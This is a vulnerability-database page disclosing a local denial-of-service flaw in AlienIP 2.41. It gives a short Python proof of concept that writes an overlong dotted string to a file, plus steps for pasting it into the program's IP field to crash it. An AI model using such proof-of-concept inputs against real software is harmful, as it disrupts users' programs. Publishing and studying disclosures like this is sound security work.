AlienIP 2.41 Denial Of Service

2018.10.29
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: AlienIP 2.41 - Denial of Service (PoC) # Author: Arturo de la Cruz Tellez # Discovery Date: 2018-10-17 # Vendor Homepage: http://www.armcode.com # Tested Version: 2.41 # Tested on OS: Microsoft Windows 10 Home Single Language x64 # VersiA3n 10.0.10240 compilaciA3n 10240 # PoC # Steps to produce the crash # 1.- Run python code : python AlienIP2.41.py # 2.- Open AlienIP2.41.txt and copy context to clipboard # 3.- Open AlienIP.exe # 4.- Paste clipboard on IP address or Country # 5.- Click in Locate host # 5.- Enter # 6.- Crashed alienip.exe dejo de funcionar buffer = "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 200 + "." + "\x41" * 69 f = open ("AlienIP2.41.txt", "w") f.write(buffer) f.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top